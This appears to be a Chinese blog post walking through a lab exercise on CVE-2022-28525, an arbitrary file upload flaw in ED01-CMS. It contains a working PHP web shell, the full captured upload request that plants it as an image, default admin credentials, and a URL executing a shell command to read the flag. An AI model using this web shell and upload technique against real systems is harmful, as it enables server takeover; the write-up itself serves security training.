CVE-2022-28525

原创 已于 2023-06-15 20:36:33 修改 · 455 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言

于 2023-06-07 16:49:57 首次发布

文章目录

CVE-2022-28525

一、漏洞介绍

ED01-CMS v20180505 存在任意文件上传漏洞

二、渗透步骤
1、打开网站
http://eci-2zedq3hmmqo1q9yhiatg.cloudeci1.ichunqiu.com/

在这里插入图片描述

2、登录后台
# 账号:admin
# 密码:admin

在这里插入图片描述

3、WebShell
<?php 
	system($_GET[1]);
?>
4、文件上传

在这里插入图片描述

在这里插入图片描述

5、截取数据包
POST /admin/users.php?source=edit_user&id=41 HTTP/1.1
Host: eci-2zedq3hmmqo1q9yhiatg.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29789280275122432703465352399
Content-Length: 1581
Origin: http://eci-2zedq3hmmqo1q9yhiatg.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zedq3hmmqo1q9yhiatg.cloudeci1.ichunqiu.com/admin/users.php?source=edit_user&id=41
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685453401,1685507993,1686039389,1686125034; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=ac8af30b24cdfe0a1face2ffbc13884c1698e153; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1686126285; PHPSESSID=d3avrn2g690cd2fi7bb0nskg7l
Upgrade-Insecure-Requests: 1

-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_id"

41
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_uname"

admin
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_email"

admin@aaa.com
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_pass1"

admin
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_pass2"

admin
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_fname"

admin
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_lname"

admin
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_image"

new
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="new_image"; filename="ant.php"
Content-Type: image/jpeg

<?php 
	system($_GET[1]);
?>

-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_role"

Administrator
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="user_status"

Active
-----------------------------29789280275122432703465352399
Content-Disposition: form-data; name="updateusersubmit"


-----------------------------29789280275122432703465352399--

在这里插入图片描述

6、查看flag值
http://eci-2zedq3hmmqo1q9yhiatg.cloudeci1.ichunqiu.com/images/ant.php?1=cat%20/flag

在这里插入图片描述

ED01-CMS 代码问题漏洞(CVE-2022-28525
千寻的博客
11-27 1250
ED01-CMS v20180505 存在任意文件上传漏洞
Taocms 代码注入漏洞(CVE-2022-25578)
千寻的博客
12-01 1887
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
春秋云镜 CVE-2022-28525
qq_22002773的博客
06-27 215
春秋云镜 CVE-2022-28525
春秋云境靶场CVE-2022-28525
qq_52923396的博客
07-06 342
CVE-2022-28525 (ED01-CMS v20180505 存在任意文件上传漏洞)4、点击edit,进行编辑,填写password,并上传文件,使用burpsuit抓包。在users/view all users 找到上传页面,6、审查图片元素发现文件路径在/images/ 路径下。3、因为是任意文件上传漏洞,在各页面查找上传接口。2、尝试弱口令admin/admin登录。test.php内容如下。
CVE-2022-28525复现文档(巨详细,零基础复现)
10-14
CVE-2022-28525 复现文档 本文档旨在详细介绍 CVE-2022-28525 的复现过程,涵盖了靶场的设置、用户名和密码的爆破、木马的上传、文件上传的修改、终端连接等多个方面,旨在帮助读者深入理解漏洞的原理和利用方法。 ...
CVE-2022-28525漏洞利用具体过程
06-08
由于CVE-2022-28525是一个比较新的漏洞,目前尚未公开该漏洞的具体利用过程。根据公开的信息,该漏洞可能涉及某个软件或系统的安全问题,攻击者可能会利用该漏洞执行一些恶意操作,可能包括远程代码执行、拒绝服务...
CVE-2022-28525漏洞复现(超详细宝宝教程)
m0_74968000的博客
12-13 720
在网上下载一个,用来爆破账号和密码。
春秋云镜靶场之CVE-2022-28525
最新发布
qq_58091216的博客
10-05 478
我们开启环境可以看到题目提示我们是文件上传漏洞,那么我们就进行测试。
【春秋云境】CVE-2022-28525
ZXW_NUDT的博客
02-22 2921
【春秋云境】CVE-2022-28525
春秋云境:CVE-2022-28525
一只爱吃橙子的羊
11-29 2497
ED01-CMS v20180505 存在任意文件上传漏洞
CVE-2022-28525 春秋云镜
biejianghua的博客
11-28 622
CVE-2022-28525
ED01-CMS v20180505 (CVE-2022-28525)
qq_45092459的博客
11-26 662
ED01-CMS v20180505(CVE-2022-28525)
ED01-CMS v20180505 文件上传漏洞(CVE-2022-28525
Flag少侠的博客
07-02 9825
CVE-2022-28525 是一个影响 ED01-CMS v20180505 版本的任意文件上传漏洞。该漏洞位于,攻击者可以利用该漏洞在未经授权的情况下上传任意文件到服务器上,从而可能导致远程代码执行(RCE)​ ()​​ ()​。漏洞的主要问题是上传功能对上传文件的类型检查不足,允许上传包含恶意代码的文件。在实际利用过程中,攻击者可以上传一个包含 PHP 代码的文件,例如shell.php,然后通过访问该文件来执行任意代码​ ()​​ ()​。
春秋云境:CVE-2022-28525 (文件上传漏洞)
m0_65712192的博客
04-19 1773
ED01-CMS v20180505 存在任意文件上传漏洞
春秋云境CVE-2022-28525
m0_64432806的博客
03-18 733
CVE-2022-28525 ED01-CMS v20180505 存在任意文件上传漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值